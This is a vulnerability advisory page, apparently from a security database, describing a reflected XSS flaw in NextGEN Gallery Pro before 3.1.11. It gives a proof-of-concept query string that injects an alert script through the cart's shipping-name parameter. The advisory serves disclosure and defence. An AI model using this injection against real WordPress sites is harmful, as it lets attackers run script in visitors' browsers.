Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitThuraMoeMyintWPEX-ID:5E1A4725-3D20-44B0-8A35-BBF4263957F7
HistoryFeb 24, 2021 - 12:00 a.m.

NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)

2021-02-2400:00:00
ThuraMoeMyint
268
JSON

In the eCommerce module of NextGEN Gallery Pro, there is an action to call get_cart_items via photocrati_ajax , after that the settings[shipping_address][name] is able to inject malicious javascript.

On a page where a NextGEN (Pro) gallery is embed: ?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E
JSON